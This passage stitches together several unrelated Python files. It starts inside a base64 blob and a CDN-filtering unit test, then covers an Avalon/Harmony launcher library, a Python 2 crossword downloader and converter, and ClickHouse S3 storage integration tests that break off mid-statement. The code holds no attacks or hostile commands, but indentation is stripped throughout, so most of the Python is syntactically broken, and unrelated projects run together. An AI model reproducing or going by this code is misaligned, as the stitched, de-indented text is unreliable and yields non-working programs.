QAVwvxX1yHw94UgvpriWA/a1SNobdJZC+xyAu/5UPGdxB4BGOa7qvIf2jP+Se2H/YVj/8ARUtJq6sOLs7nzZ
qmoXGqX897dStLNM5ZnYAEn3wAKpVtReHb99Mj1FrS4+yOCyyxIsmQDgnG4HjoapzadLBciCaOWByN22eFkbHqQAeKdrA5czux2jyRR3rmcrs+zzAbhn5vLbb+O7FUCSeT3qcWwaTYk0R4zuyQP1x6VPa6ZNdXcVsjQb5c7MyrhjjIH44wPc0yblCir0+lXkEE0s8DQrE/lt5g2kt6YqkRikMTNPEjjoaZRTu0B9/UUUUgI5ovNQLnGDnpVf7B1/e9f9n/AOvVyigCkNPwf9b/AOO//XobT9w/1v8A47/9ertFAFH+zv8Apr/47/8AXqK+0gXtoYDNtyc7tuf61p0UmkwOUtPBX2S4WUahu29vJxnj/erUGh4/5eO+fuf/AF616KxqYalUd5Iak1sZtrpP2ZZF8/cGfcPkxjjnv65P41j+P/Bn/Cc6DBpn2/7F5Vytx5nk+ZnCsuMbh/e657V1VFdeHrTw041KTs47f0yWk1Znh3/DO3/U0/8AlP8A/ttH/DO3/U0/+U//AO217jRXsf6yZp/z9/8AJY/5GfsYdjw7/hnb/qaf/Kf/APbaP+Gd/wDqaf8Ayn//AG2vcaKP9ZMz/wCfv/ksf8g9jDseHf8ADO//AFNP/lP/APttSSfs9h0Rf+EnwVGM/YOv/kSvbaKwnnePnUjUlU1W2i/yKVOKVkjw7/hnb/qaf/Kf/wDbaP8Ahnb/AKmn/wAp/wD9tr3Git/9ZMz/AOfv/ksf8ifYw7BRRRXhmoUUUUAFFFFABRRRQAVyHxG8Df8ACwPD1vpX9o/YPJulufN8nzc4R1243L/fznPauvooA81HwsvV8NaXoEPiOO1sbWKS3ufs2nDzLmKRgXG93YoWO4krxyPlwAKtap8J9KvfEN1r9rOYNRmiaNDLH5kUZKJGCEVl6Krd+r5zwK9AooA82T4TLCmrCPVoy91cfaLQzWfmLasUZGBBf94MNkA4AKjqOC+8+DPhu8htUMaRPH5PnPDAsZkKZLEFMFS5xnkgAcAH5q9GooCx5drnwU0vV2YR37wRFPlRkaTEu0KJC28FjgfxZ7c9c81ffs2w3N5JLb+KGghbG2NrEyFeP7xlGa92ooFY8A/4Zm/6m7/ym/8A22j/AIZm/wCpu/8AKb/9tr3+igYUUUUAfwDgDQAhJQcQFweADhfhDR+/AP/ZCgo='},
timeout=60,
)
print(rsp.content)
print(f"响应时间{time.time()-starttime}m")
except:
pass
def testCdn(self):
"""
        Test CDN filtering.
:return:
"""
CDN = CDNProxy()
all_cdn = CDN.open_cdn_file()
s = select()
cdns = [all_cdn[i:i + 50] for i in range(0, len(all_cdn), 50)]
for i in cdns:
t = threading.Thread(target=s.cdn_req, args=(i,))
t.start()
if __name__ == '__main__':
unittest.main()
|
lib.py
|
import subprocess
import threading
import os
import random
import zipfile
import sys
import importlib
import queue
import shutil
import logging
import contextlib
import json
import signal
import time
from .server import Server
from ..vendor.Qt import QtWidgets
from ..tools import workfiles
from ..toonboom import setup_startup_scripts
self = sys.modules[__name__]
self.server = None
self.pid = None
self.application_path = None
self.callback_queue = None
self.workfile_path = None
self.port = None
# Setup logging.
self.log = logging.getLogger(__name__)
self.log.setLevel(logging.DEBUG)
def execute_in_main_thread(func_to_call_from_main_thread):
self.callback_queue.put(func_to_call_from_main_thread)
def main_thread_listen():
callback = self.callback_queue.get()
callback()
def launch(application_path):
"""Setup for Harmony launch.
Launches Harmony and the server, then starts listening on the main thread
for callbacks from the server. This is to have Qt applications run in the
main thread.
"""
from avalon import api, harmony
api.install(harmony)
self.port = random.randrange(5000, 6000)
os.environ["AVALON_HARMONY_PORT"] = str(self.port)
self.application_path = application_path
# Launch Harmony.
setup_startup_scripts()
if os.environ.get("AVALON_HARMONY_WORKFILES_ON_LAUNCH", False):
workfiles.show(save=False)
# No launch through Workfiles happened.
if not self.workfile_path:
zip_file = os.path.join(os.path.dirname(__file__), "temp.zip")
launch_zip_file(zip_file)
self.callback_queue = queue.Queue()
while True:
main_thread_listen()
def get_local_harmony_path(filepath):
"""From the provided path get the equivalent local Harmony path."""
basename = os.path.splitext(os.path.basename(filepath))[0]
harmony_path = os.path.join(os.path.expanduser("~"), ".avalon", "harmony")
return os.path.join(harmony_path, basename)
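# For illustration (hypothetical paths): a remote workfile such as
# "/projects/show/scene_v001.zip" would map to the local working copy
# "~/.avalon/harmony/scene_v001", where the zip is extracted and launched.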
def launch_zip_file(filepath):
"""Launch a Harmony application instance with the provided zip file."""
print("Localizing {}".format(filepath))
temp_path = get_local_harmony_path(filepath)
scene_path = os.path.join(
temp_path, os.path.basename(temp_path) + ".xstage"
)
unzip = False
if os.path.exists(scene_path):
# Check remote scene is newer than local.
if os.path.getmtime(scene_path) < os.path.getmtime(filepath):
shutil.rmtree(temp_path)
unzip = True
else:
unzip = True
if unzip:
with zipfile.ZipFile(filepath, "r") as zip_ref:
zip_ref.extractall(temp_path)
# Close existing scene.
if self.pid:
os.kill(self.pid, signal.SIGTERM)
# Stop server.
if self.server:
self.server.stop()
# Launch Avalon server.
self.server = Server(self.port)
thread = threading.Thread(target=self.server.start)
thread.daemon = True
thread.start()
# Save workfile path for later.
self.workfile_path = filepath
print("Launching {}".format(scene_path))
process = subprocess.Popen([self.application_path, scene_path])
self.pid = process.pid
def on_file_changed(path, threaded=True):
"""Threaded zipping and move of the project directory.
This method is called when the `.xstage` file is changed.
"""
self.log.debug("File changed: " + path)
if self.workfile_path is None:
return
if threaded:
thread = threading.Thread(
target=zip_and_move,
args=(os.path.dirname(path), self.workfile_path)
)
thread.start()
else:
zip_and_move(os.path.dirname(path), self.workfile_path)
def zip_and_move(source, destination):
"""Zip a directory and move to `destination`
Args:
- source (str): Directory to zip and move to destination.
- destination (str): Destination file path to zip file.
"""
os.chdir(os.path.dirname(source))
shutil.make_archive(os.path.basename(source), "zip", source)
shutil.move(os.path.basename(source) + ".zip", destination)
self.log.debug("Saved \"{}\" to \"{}\"".format(source, destination))
def show(module_name):
"""Call show on "module_name".
    This allows making a QApplication ahead of time and always calling
    "exec_" to prevent crashing.
Args:
module_name (str): Name of module to call "show" on.
"""
# Requests often get doubled up when showing tools, so we wait a second for
# requests to be received properly.
time.sleep(1)
# Need to have an existing QApplication.
app = QtWidgets.QApplication.instance()
if not app:
app = QtWidgets.QApplication(sys.argv)
# Import and show tool.
module = importlib.import_module(module_name)
if "loader" in module_name:
module.show(use_context=True)
else:
module.show()
# QApplication needs to always execute.
if "publish" in module_name:
return
app.exec_()
def get_scene_data():
func = """function func(args)
{
var metadata = scene.metadata("avalon");
if (metadata){
return JSON.parse(metadata.value);
}else {
return {};
}
}
func
"""
try:
return self.send({"function": func})["result"]
except json.decoder.JSONDecodeError:
        # Means no scene metadata has been made before.
return {}
except KeyError:
# Means no existing scene metadata has been made.
return {}
def set_scene_data(data):
# Write scene data.
func = """function func(args)
{
scene.setMetadata({
"name" : "avalon",
"type" : "string",
"creator" : "Avalon",
"version" : "1.0",
"value" : JSON.stringify(args[0])
});
}
func
"""
self.send({"function": func, "args": [data]})
def read(node_id):
"""Read object metadata in to a dictionary.
Args:
node_id (str): Path to node or id of object.
Returns:
dict
"""
scene_data = get_scene_data()
    if node_id in scene_data:
        return scene_data[node_id]
return {}
def remove(node_id):
data = get_scene_data()
del data[node_id]
set_scene_data(data)
def imprint(node_id, data, remove=False):
"""Write `data` to the `node` as json.
Arguments:
node_id (str): Path to node or id of object.
data (dict): Dictionary of key/value pairs.
remove (bool): Removes the data from the scene.
Example:
>>> from avalon.harmony import lib
>>> node = "Top/Display"
>>> data = {"str": "someting", "int": 1, "float": 0.32, "bool": True}
>>> lib.imprint(layer, data)
"""
scene_data = get_scene_data()
if remove and (node_id in scene_data):
scene_data.pop(node_id, None)
else:
if node_id in scene_data:
scene_data[node_id].update(data)
else:
scene_data[node_id] = data
set_scene_data(scene_data)
@contextlib.contextmanager
def maintained_selection():
"""Maintain selection during context."""
func = """function get_selection_nodes()
{
var selection_length = selection.numberOfNodesSelected();
var selected_nodes = [];
for (var i = 0 ; i < selection_length; i++)
{
selected_nodes.push(selection.selectedNode(i));
}
return selected_nodes
}
get_selection_nodes
"""
selected_nodes = self.send({"function": func})["result"]
func = """function select_nodes(node_paths)
{
selection.clearSelection();
for (var i = 0 ; i < node_paths.length; i++)
{
selection.addNodeToSelection(node_paths[i]);
}
}
select_nodes
"""
try:
yield selected_nodes
finally:
selected_nodes = self.send(
{"function": func, "args": selected_nodes}
)
def send(request):
"""Public method for sending requests to Harmony."""
return self.server.send(request)
@contextlib.contextmanager
def maintained_nodes_state(nodes):
"""Maintain nodes states during context."""
# Collect current state.
states = []
for node in nodes:
states.append(
self.send(
{"function": "node.getEnable", "args": [node]}
)["result"]
)
# Disable all nodes.
func = """function func(nodes)
{
for (var i = 0 ; i < nodes.length; i++)
{
node.setEnable(nodes[i], false);
}
}
func
"""
self.send({"function": func, "args": [nodes]})
# Restore state after yield.
func = """function func(args)
{
var nodes = args[0];
var states = args[1];
for (var i = 0 ; i < nodes.length; i++)
{
node.setEnable(nodes[i], states[i]);
}
}
func
"""
try:
yield
finally:
self.send({"function": func, "args": [nodes, states]})
def save_scene():
"""Saves the Harmony scene safely.
The built-in (to Avalon) background zip and moving of the Harmony scene
    folder, interferes with server/client communication by sending two requests
at the same time. This only happens when sending "scene.saveAll()". This
method prevents this double request and safely saves the scene.
"""
    # Need to turn off the background watcher, else the communication with
    # the server gets spammed with two requests at the same time.
func = """function func()
{
var app = QCoreApplication.instance();
app.avalon_on_file_changed = false;
scene.saveAll();
return (
scene.currentProjectPath() + "/" +
scene.currentVersionName() + ".xstage"
);
}
func
"""
scene_path = self.send({"function": func})["result"]
# Manually update the remote file.
self.on_file_changed(scene_path, threaded=False)
# Re-enable the background watcher.
func = """function func()
{
var app = QCoreApplication.instance();
app.avalon_on_file_changed = true;
}
func
"""
self.send({"function": func})
def save_scene_as(filepath):
"""Save Harmony scene as `filepath`."""
scene_dir = os.path.dirname(filepath)
destination = os.path.join(
os.path.dirname(self.workfile_path),
os.path.splitext(os.path.basename(filepath))[0] + ".zip"
)
if os.path.exists(scene_dir):
shutil.rmtree(scene_dir)
send(
{"function": "scene.saveAs", "args": [scene_dir]}
)["result"]
zip_and_move(scene_dir, destination)
self.workfile_path = destination
func = """function add_path(path)
{
var app = QCoreApplication.instance();
app.watcher.addPath(path);
}
add_path
"""
send(
{"function": func, "args": [filepath]}
)
def find_node_by_name(name, node_type):
nodes = send(
{"function": "node.getNodes", "args": [[node_type]]}
)["result"]
for node in nodes:
node_name = node.split("/")[-1]
if name == node_name:
return node
return None
|
manager.py
|
import os
import puzpy
import datetime
import json
import xml.etree.ElementTree as xml_tree
import threading
import time
import db
import downloaders
class Manager(object):
database = None
base_path = None
crossword_path = None
stopping = False
download_thread = None
def __init__(self, base_path, db_file):
self.database = db.DB(db_file)
self.base_path = base_path
self.crossword_path = os.path.join(self.base_path, "crosswords")
self.download_thread = threading.Thread(target=self.download_loop)
self.download_thread.start()
return
def __del__(self):
self.stopping = True
self.database.__del__()
def download_loop(self):
delay = 60*60
i = delay
while True:
while delay > i:
if self.stopping:
return
time.sleep(1)
i += 1
i = 0
self.download_puzzles()
def download_puzzles(self):
dl = [
(downloaders.LATimesDownloader, "{0}-{1}-{2}.LA Times", 'xml', self.read_xml)
]
        titles = list(map(lambda p: p["Title"], self.database.select_puzzles()))
if not os.path.exists(self.crossword_path):
os.makedirs(self.crossword_path)
now = datetime.datetime.today()
for i in range(0, 30):
current = now - datetime.timedelta(days=i)
for downloader, mask, extension, reader in dl:
if self.stopping:
return
title = mask.format(current.year, current.month, current.day)
if title not in titles:
filename = os.path.join(self.crossword_path, title + "." + extension)
try:
if not os.path.exists(filename):
data = downloader.download(current)
time.sleep(1)
with open(filename, 'w') as puzzle:
puzzle.write(data)
js = reader(filename)
self.database.insert_puzzle(title, db.get_timestamp(current), json.dumps(js))
except Exception as e:
print "Failed to process " + filename
print e
return
def read_puz(self, path):
return self.puz_to_json(puzpy.read(path))
def read_xml(self, path):
xml = None
with open(path, 'r') as obj:
xml = obj.read()
xml = xml.replace( "xmlns=", "blank=")
return self.xml_to_json(xml_tree.fromstring(xml))
def xml_to_json(self, puzzle):
js = dict()
crossword = puzzle.find(".//crossword")
js["title"] = puzzle.find(".//title").text
grid = crossword.find("./grid")
js["height"] = int(grid.attrib["height"])
js["width"] = int(grid.attrib["width"])
js["rows"] = [[]]
js["clues"] = [{},{}]
for y in range(1, js["height"]+1):
row = []
for x in range(1, js["width"]+1):
cell = grid.find("./cell[@x='{0}'][@y='{1}']".format(x,y))
cell = {
"clue" : int(cell.attrib["number"]) if "number" in cell.attrib.keys() else None,
"black" : cell.attrib["type"] == "block" if "type" in cell.attrib.keys() else None
}
row.append(cell)
js["rows"].append(row)
words = crossword.findall("./word")
for word in words:
clue = crossword.find(".//clue[@word='{0}']".format(word.attrib["id"]))
number = clue.attrib["number"]
clue_index = 0 if "-" in word.attrib["x"] else 1
js["clues"][clue_index][number] = clue.text
return js
def puz_to_json(self, puzzle):
js = dict()
js["title"] = puzzle.title
js["height"] = puzzle.height
js["width"] = puzzle.width
js["rows"] = [[]]
js["clues"] = [{},{}]
x, y, c, i = 0, 0, 1, 0
for char in list(puzzle.fill):
if x >= puzzle.width:
x = 0
y += 1
js["rows"].append([])
black = char == '.'
horz_clue = not black and (x == 0 or js["rows"][y][x-1]["black"])
vert_clue = not black and (y == 0 or js["rows"][y-1][x]["black"])
clue = c if horz_clue or vert_clue else None
if clue is not None: c += 1
js["rows"][y].append({
"black" : black,
"clue" : clue
})
if horz_clue:
js["clues"][0][clue] = puzzle.clues[i]
i += 1
if vert_clue:
js["clues"][1][clue] = puzzle.clues[i]
i += 1
x += 1
return js
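# Sketch of the JSON shape both readers produce, inferred from the code above
# (values are placeholders): "rows" is a grid of cells and "clues" holds the
# across (index 0) and down (index 1) clue maps keyed by clue number.
#
#   {"title": "...", "width": 15, "height": 15,
#    "rows": [[{"black": False, "clue": 1}, ...], ...],
#    "clues": [{1: "Across clue text"}, {1: "Down clue text"}]}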
|
test.py
|
import logging
import random
import string
import time
import threading
import os
import pytest
from helpers.cluster import ClickHouseCluster
logging.getLogger().setLevel(logging.INFO)
logging.getLogger().addHandler(logging.StreamHandler())
# By default, exceptions thrown in threads are ignored
# (they will not mark the test as failed, only printed to stderr).
#
# Wrap threading.Thread and re-throw the exception on join().
class SafeThread(threading.Thread):
def __init__(self, target):
super().__init__()
self.target = target
self.exception = None
def run(self):
try:
self.target()
except Exception as e: # pylint: disable=broad-except
self.exception = e
def join(self, timeout=None):
super().join(timeout)
if self.exception:
raise self.exception
SCRIPT_DIR = os.path.dirname(os.path.realpath(__file__))
CONFIG_PATH = os.path.join(SCRIPT_DIR, './_instances/node/configs/config.d/storage_conf.xml')
def replace_config(old, new):
config = open(CONFIG_PATH, 'r')
config_lines = config.readlines()
config.close()
config_lines = [line.replace(old, new) for line in config_lines]
config = open(CONFIG_PATH, 'w')
config.writelines(config_lines)
config.close()
@pytest.fixture(scope="module")
def cluster():
try:
cluster = ClickHouseCluster(__file__)
cluster.add_instance("node", main_configs=["configs/config.d/storage_conf.xml",
"configs/config.d/bg_processing_pool_conf.xml",
"configs/config.d/log_conf.xml"], with_minio=True)
logging.info("Starting cluster...")
cluster.start()
logging.info("Cluster started")
yield cluster
finally:
cluster.shutdown()
FILES_OVERHEAD = 1
FILES_OVERHEAD_PER_COLUMN = 2 # Data and mark files
FILES_OVERHEAD_PER_PART_WIDE = FILES_OVERHEAD_PER_COLUMN * 3 + 2 + 6 + 1
FILES_OVERHEAD_PER_PART_COMPACT = 10 + 1
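# Arithmetic behind the constants above: a wide part is counted as
# 2 files per column * 3 columns + 2 + 6 + 1 = 15 objects, and a compact part
# as 10 + 1 = 11; the tests below use these figures to predict how many
# objects should exist in the MinIO bucket.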
def random_string(length):
letters = string.ascii_letters
return ''.join(random.choice(letters) for i in range(length))
def generate_values(date_str, count, sign=1):
data = [[date_str, sign * (i + 1), random_string(10)] for i in range(count)]
data.sort(key=lambda tup: tup[1])
return ",".join(["('{}',{},'{}')".format(x, y, z) for x, y, z in data])
def create_table(cluster, table_name, additional_settings=None):
node = cluster.instances["node"]
create_table_statement = """
CREATE TABLE {} (
dt Date,
id Int64,
data String,
INDEX min_max (id) TYPE minmax GRANULARITY 3
) ENGINE=MergeTree()
PARTITION BY dt
ORDER BY (dt, id)
SETTINGS
storage_policy='s3',
old_parts_lifetime=0,
index_granularity=512
""".format(table_name)
if additional_settings:
create_table_statement += ","
create_table_statement += additional_settings
node.query(create_table_statement)
def wait_for_delete_s3_objects(cluster, expected, timeout=30):
minio = cluster.minio_client
while timeout > 0:
if len(list(minio.list_objects(cluster.minio_bucket, 'data/'))) == expected:
return
timeout -= 1
time.sleep(1)
assert(len(list(minio.list_objects(cluster.minio_bucket, 'data/'))) == expected)
@pytest.fixture(autouse=True)
def drop_table(cluster):
yield
node = cluster.instances["node"]
minio = cluster.minio_client
node.query("DROP TABLE IF EXISTS s3_test NO DELAY")
try:
wait_for_delete_s3_objects(cluster, 0)
finally:
# Remove extra objects to prevent tests cascade failing
for obj in list(minio.list_objects(cluster.minio_bucket, 'data/')):
minio.remove_object(cluster.minio_bucket, obj.object_name)
@pytest.mark.parametrize(
"min_rows_for_wide_part,files_per_part",
[
(0, FILES_OVERHEAD_PER_PART_WIDE),
(8192, FILES_OVERHEAD_PER_PART_COMPACT)
]
)
def test_simple_insert_select(cluster, min_rows_for_wide_part, files_per_part):
create_table(cluster, "s3_test", additional_settings="min_rows_for_wide_part={}".format(min_rows_for_wide_part))
node = cluster.instances["node"]
minio = cluster.minio_client
values1 = generate_values('2020-01-03', 4096)
node.query("INSERT INTO s3_test VALUES {}".format(values1))
assert node.query("SELECT * FROM s3_test order by dt, id FORMAT Values") == values1
assert len(list(minio.list_objects(cluster.minio_bucket, 'data/'))) == FILES_OVERHEAD + files_per_part
values2 = generate_values('2020-01-04', 4096)
node.query("INSERT INTO s3_test VALUES {}".format(values2))
assert node.query("SELECT * FROM s3_test ORDER BY dt, id FORMAT Values") == values1 + "," + values2
assert len(list(minio.list_objects(cluster.minio_bucket, 'data/'))) == FILES_OVERHEAD + files_per_part * 2
assert node.query("SELECT count(*) FROM s3_test where id = 1 FORMAT Values") == "(2)"
@pytest.mark.parametrize(
"merge_vertical", [False, True]
)
def test_insert_same_partition_and_merge(cluster, merge_vertical):
settings = None
if merge_vertical:
settings = """
vertical_merge_algorithm_min_rows_to_activate=0,
vertical_merge_algorithm_min_columns_to_activate=0
"""
create_table(cluster, "s3_test", additional_settings=settings)
node = cluster.instances["node"]
minio = cluster.minio_client
node.query("SYSTEM STOP MERGES s3_test")
node.query("INSERT INTO s3_test VALUES {}".format(generate_values('2020-01-03', 1024)))
node.query("INSERT INTO s3_test VALUES {}".format(generate_values('2020-01-03', 2048)))
node.query("INSERT INTO s3_test VALUES {}".format(generate_values('2020-01-03', 4096)))
node.query("INSERT INTO s3_test VALUES {}".format(generate_values('2020-01-03', 1024, -1)))
node.query("INSERT INTO s3_test VALUES {}".format(generate_values('2020-01-03', 2048, -1)))
node.query("INSERT INTO s3_test VALUES {}".format(generate_values('2020-01-03', 4096, -1)))
assert node.query("SELECT sum(id) FROM s3_test FORMAT Values") == "(0)"
assert node.query("SELECT count(distinct(id)) FROM s3_test FORMAT Values") == "(8192)"
assert len(
list(minio.list_objects(cluster.minio_bucket, 'data/'))) == FILES_OVERHEAD_PER_PART_WIDE * 6 + FILES_OVERHEAD
node.query("SYSTEM START MERGES s3_test")
# Wait for merges and old parts deletion
for attempt in range(0, 10):
parts_count = node.query("SELECT COUNT(*) FROM system.parts WHERE table = 's3_test' FORMAT Values")
if parts_count == "(1)":
break
if attempt == 9:
assert parts_count == "(1)"
time.sleep(1)
assert node.query("SELECT sum(id) FROM s3_test FORMAT Values") == "(0)"
assert node.query("SELECT count(distinct(id)) FROM s3_test FORMAT Values") == "(8192)"
wait_for_delete_s3_objects(cluster, FILES_OVERHEAD_PER_PART_WIDE + FILES_OVERHEAD)
def test_alter_table_columns(cluster):
create_table(cluster, "s3_test")
node = cluster.instances["node"]
minio = cluster.minio_client
node.query("INSERT INTO s3_test VALUES {}".format(generate_values('2020-01-03', 4096)))
node.query("INSERT INTO s3_test VALUES {}".format(generate_values('2020-01-03', 4096, -1)))
node.query("ALTER TABLE s3_test ADD COLUMN col1 UInt64 DEFAULT 1")
# To ensure parts have merged
node.query("OPTIMIZE TABLE s3_test")
assert node.query("SELECT sum(col1) FROM s3_test FORMAT Values") == "(8192)"
assert node.query("SELECT sum(col1) FROM s3_test WHERE id > 0 FORMAT Values") == "(4096)"
wait_for_delete_s3_objects(cluster, FILES_OVERHEAD + FILES_OVERHEAD_PER_PART_WIDE + FILES_OVERHEAD_PER_COLUMN)
node.query("ALTER TABLE s3_test MODIFY COLUMN col1 String", settings={"mutations_sync": 2})
assert node.query("SELECT distinct(col1) FROM s3_test FORMAT Values") == "('1')"
# and file with mutation
wait_for_delete_s3_objects(cluster, FILES_OVERHEAD + FILES_OVERHEAD_PER_PART_WIDE + FILES_OVERHEAD_PER_COLUMN + 1)
node.query("ALTER TABLE s3_test DROP COLUMN col1", settings={"mutations_sync": 2})
# and 2 files with mutations
wait_for_delete_s3_objects(cluster, FILES_OVERHEAD + FILES_OVERHEAD_PER_PART_WIDE + 2)
def test_attach_detach_partition(cluster):
create_table(cluster, "s3_test")
node = cluster.instances["node"]
minio = cluster.minio_client
node.query("INSERT INTO s3_test VALUES {}".format(generate_values('2020-01-03', 4096)))
node.query("INSERT INTO s3_test VALUES {}".format(generate_values('2020-01-04', 4096)))
assert node.query("SELECT count(*) FROM s3_test FORMAT Values") == "(8192)"
assert len(
list(minio.list_objects(cluster.minio_bucket, 'data/'))) == FILES_OVERHEAD + FILES_OVERHEAD_PER_PART_WIDE * 2
node.query("ALTER TABLE s3_test DETACH PARTITION '2020-01-03'")
assert node.query("SELECT count(*) FROM s3_test FORMAT Values") == "(4096)"
assert len(
list(minio.list_objects(cluster.minio_bucket, 'data/'))) == FILES_OVERHEAD + FILES_OVERHEAD_PER_PART_WIDE * 2
node.query("ALTER TABLE s3_test ATTACH PARTITION '2020-01-03'")
assert node.query("SELECT count(*) FROM s3_test FORMAT Values") == "(8192)"
assert len(
list(minio.list_objects(cluster.minio_bucket, 'data/'))) == FILES_OVERHEAD + FILES_OVERHEAD_PER_PART_WIDE * 2
node.query("ALTER TABLE s3_test DROP PARTITION '2020-01-03'")
assert node.query("SELECT count(*) FROM s3_test FORMAT Values") == "(4096)"
assert len(list(minio.list_objects(cluster.minio_bucket, 'data/'))) == FILES_OVERHEAD + FILES_OVERHEAD_PER_PART_WIDE
node.query("ALTER TABLE s3_test DETACH PARTITION '2020-01-04'")
node.query("ALTER TABLE s3_test DROP DETACHED PARTITION '2020-01-04'", settings={"allow_drop_detached": 1})
assert node.query("SELECT count(*) FROM s3_test FORMAT Values") == "(0)"
assert len(list(minio.list_objects(cluster.minio_bucket, 'data/'))) == FILES_OVERHEAD
def test_move_partition_to_another_disk(cluster):
create_table(cluster, "s3_test")
node = cluster.instances["node"]
minio = cluster.minio_client
node.query("INSERT INTO s3_test VALUES {}".format(generate_values('2020-01-03', 4096)))
node.query("INSERT INTO s3_test VALUES {}".format(generate_values('2020-01-04', 4096)))
assert node.query("SELECT count(*) FROM s3_test FORMAT Values") == "(8192)"
assert len(
list(minio.list_objects(cluster.minio_bucket, 'data/'))) == FILES_OVERHEAD + FILES_OVERHEAD_PER_PART_WIDE * 2
node.query("ALTER TABLE s3_test MOVE PARTITION '2020-01-04' TO DISK 'hdd'")
assert node.query("SELECT count(*) FROM s3_test FORMAT Values") == "(8192)"
assert len(list(minio.list_objects(cluster.minio_bucket, 'data/'))) == FILES_OVERHEAD + FILES_OVERHEAD_PER_PART_WIDE
node.query("ALTER TABLE s3_test MOVE PARTITION '2020-01-04' TO DISK 's3'")
assert node.query("SELECT count(*) FROM s3_test FORMAT Values") == "(8192)"
assert len(
list(minio.list_objects(cluster.minio_bucket, 'data/'))) == FILES_OVERHEAD + FILES_OVERHEAD_PER_PART_WIDE * 2
def test_table_manipulations(cluster):
create_table(cluster, "s3_test")
node = cluster.instances["node"]
minio = cluster.minio_client
node.query("INSERT INTO s3_test VALUES {}".format(generate_values('2020-01-03', 4096)))
node.query("INSERT INTO s3_test VALUES {}".format(generate_values('2020-01-04', 4096)))
node.query("RENAME TABLE s3_test TO s3_renamed")
assert node.query("SELECT count(*) FROM s3_renamed FORMAT Values") == "(8192)"
assert len(
list(minio.list_objects(cluster.minio_bucket, 'data/'))) == FILES_OVERHEAD + FILES_OVERHEAD_PER_PART_WIDE * 2
node.query("RENAME TABLE s3_renamed TO s3_test")
assert node.query("CHECK TABLE s3_test FORMAT Values") == "(1)"
node.query("DETACH TABLE s3_test")
node.query("ATTACH TABLE s3_test")
assert node.query("SELECT count(*) FROM s3_test FORMAT Values") == "(8192)"
assert len(
list(minio.list_objects(cluster.minio_bucket, 'data/'))) == FILES_OVERHEAD + FILES_OVERHEAD_PER_PART_WIDE * 2
node.query("TRUNCATE TABLE s3_test")
assert node.query("SELECT count(*) FROM s3_test FORMAT Values") == "(0)"
assert len(list(minio.list_objects(cluster.minio_bucket, 'data/'))) == FILES_OVERHEAD
def test_move_replace_partition_to_another_table(cluster):
create_table(cluster, "s3_test")
node = cluster.instances["node"]
minio = cluster.minio_client
node.query("INSERT INTO s3_test VALUES {}".format(generate_values('2020-01-03', 4096)))
node.query("INSERT INTO s3_test VALUES {}".format(generate_values('2020-01-04', 4096)))
node.query("INSERT INTO s3_test VALUES {}".format(generate_values('2020-01-05', 4096, -1)))
node.query("INSERT INTO s3_test VALUES {}".format(generate_values('2020-01-06', 4096, -1)))
assert node.query("SELECT sum(id) FROM s3_test FORMAT Values") == "(0)"
assert node.query("SELECT count(*) FROM s3_test FORMAT Values") == "(16384)"
assert len(
list(minio.list_objects(cluster.minio_bucket, 'data/'))) == FILES_OVERHEAD + FILES_OVERHEAD_PER_PART_WIDE * 4
create_table(cluster, "s3_clone")
node.query("ALTER TABLE s3_test MOVE PARTITION '2020-01-03' TO TABLE s3_clone")
node.query("ALTER TABLE s3_test MOVE PARTITION '2020-01-05' TO TABLE s3_clone")
assert node.query("SELECT sum(id) FROM s3_test FORMAT Values") == "(0)"
assert node.query("SELECT count(*) FROM s3_test FORMAT Values") == "(8192)"
assert node.query("SELECT sum(id) FROM s3_clone FORMAT Values") == "(0)"
assert node.query("SELECT count(*) FROM s3_clone FORMAT Values") == "(8192)"
# Number of objects in S3 should be unchanged.
assert len(list(
minio.list_objects(cluster.minio_bucket, 'data/'))) == FILES_OVERHEAD * 2 + FILES_OVERHEAD_PER_PART_WIDE * 4
# Add new partitions to source table, but with different values and replace them from copied table.
node.query("INSERT INTO s3_test VALUES {}".format(generate_values('2020-01-03', 4096, -1)))
node.query("INSERT INTO s3_test VALUES {}".format(generate_values('2020-01-05', 4096)))
assert node.query("SELECT sum(id) FROM s3_test FORMAT Values") == "(0)"
assert node.query("SELECT count(*) FROM s3_test FORMAT Values") == "(16384)"
assert len(list(
minio.list_objects(cluster.minio_bucket, 'data/'))) == FILES_OVERHEAD * 2 + FILES_OVERHEAD_PER_PART_WIDE * 6
node.query("ALTER TABLE s3_test REPLACE PARTITION '2020-01-03' FROM s3_clone")
node.query("ALTER TABLE s3_test REPLACE PARTITION '2020-01-05' FROM s3_clone")
assert node.query("SELECT sum(id) FROM s3_test FORMAT Values") == "(0)"
assert node.query("SELECT count(*) FROM s3_test FORMAT Values") == "(16384)"
assert node.query("SELECT sum(id) FROM s3_clone FORMAT Values") == "(0)"
assert node.query("SELECT count(*) FROM s3_clone FORMAT Values") == "(8192)"
# Wait for outdated partitions deletion.
wait_for_delete_s3_objects(cluster, FILES_OVERHEAD * 2 + FILES_OVERHEAD_PER_PART_WIDE * 4)
node.query("DROP TABLE s3_clone NO DELAY")
assert node.query("SELECT sum(id) FROM s3_test FORMAT Values") == "(0)"
assert node.query("SELECT count(*) FROM s3_test FORMAT Values") == "(16384)"
# Data should remain in S3
assert len(
list(minio.list_objects(cluster.minio_bucket, 'data/'))) == FILES_OVERHEAD + FILES_OVERHEAD_PER_PART_WIDE * 4
node.query("ALTER TABLE s3_test FREEZE")
# Number S3 objects should be unchanged.
assert len(
list(minio.list_objects(cluster.minio_bucket, 'data/'))) == FILES_OVERHEAD + FILES_OVERHEAD_PER_PART_WIDE * 4
node.query("DROP TABLE s3_test NO DELAY")
# Backup data should remain in S3.
wait_for_delete_s3_objects(cluster, FILES_OVERHEAD_PER_PART_WIDE * 4)
for obj in list(minio.list_objects(cluster.minio_bucket, 'data/')):
minio.remove_object(cluster.minio_bucket, obj.object_name)
def test_freeze_unfreeze(cluster):
create_table(cluster, "s3_test")
node = cluster.instances["node"]
minio = cluster.minio_client
node.query("INSERT INTO s3_test VALUES {}".format(generate_values('2020-01-03', 4096)))
node.query("ALTER TABLE s3_test FREEZE WITH NAME 'backup1'")
node.query("INSERT INTO s3_test VALUES {}".format(generate_values('2020-01-04', 4096)))
node.query("ALTER TABLE s3_test FREEZE WITH NAME 'backup2'")
node.query("TRUNCATE TABLE s3_test")
assert len(
list(minio.list_objects(cluster.minio_bucket, 'data/'))) == FILES_OVERHEAD + FILES_OVERHEAD_PER_PART_WIDE * 2
# Unfreeze single partition from backup1.
node.query("ALTER TABLE s3_test UNFREEZE PARTITION '2020-01-03' WITH NAME 'backup1'")
# Unfreeze all partitions from backup2.
node.query("ALTER TABLE s3_test UNFREEZE WITH NAME 'backup2'")
# Data should be removed from S3.
assert len(
